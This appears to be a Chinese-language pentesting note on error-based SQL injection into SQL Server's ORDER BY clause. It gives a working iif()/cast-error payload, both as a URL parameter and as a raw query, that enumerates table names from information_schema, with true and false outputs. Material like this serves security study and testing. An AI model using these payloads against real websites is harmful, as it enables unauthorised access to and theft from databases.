0x01 前言

与普通注入无异,记一下语法即可

类似的更详细一些的文章:https://www.yuque.com/pmiaowu/web_security_1/ksym0w

0x01 基本数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 猜表名

注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

修改 LEFT() 函数 第二个参数可以控制出来得数据

查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?orderby=id-iif((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)like’%article%’,1,’x’)

数据库语句: SELECT * from article order by id-iif((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)like’%article%’,1,’x’) desc

  1. # 查询当前库 表一名称
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. ORDER BY
  8. id - iif (
  9. (
  10. SELECT
  11. table_name
  12. FROM
  13. (
  14. SELECT
  15. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  16. table_name
  17. FROM
  18. information_schema.tables
  19. WHERE
  20. table_catalog = db_name()
  21. ) AS a
  22. WHERE
  23. row_number = 1
  24. ) LIKE '%article%',
  25. 1,
  26. 'x'
  27. ) DESC;
  28. 2> go
  29. +----+-----------+-----------+
  30. | id | title | content |
  31. +----+-----------+-----------+
  32. | 2 | 测试标题2 | 测试内容2 |
  33. | 1 | 测试标题 | 测试内容 |
  34. +----+-----------+-----------+
  35. (2 rows affected)
  36. # 错误的情况
  37. 1> SELECT
  38. *
  39. FROM
  40. article
  41. ORDER BY
  42. id - iif (
  43. (
  44. SELECT
  45. table_name
  46. FROM
  47. (
  48. SELECT
  49. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  50. table_name
  51. FROM
  52. information_schema.tables
  53. WHERE
  54. table_catalog = db_name()
  55. ) AS a
  56. WHERE
  57. row_number = 1
  58. ) LIKE '%aaaaaaaaaaa%',
  59. 1,
  60. 'x'
  61. ) DESC;
  62. 2> go
  63. 22018 - [SQL Server]在将 varchar 'x' 转换成数据类型 int 时失败。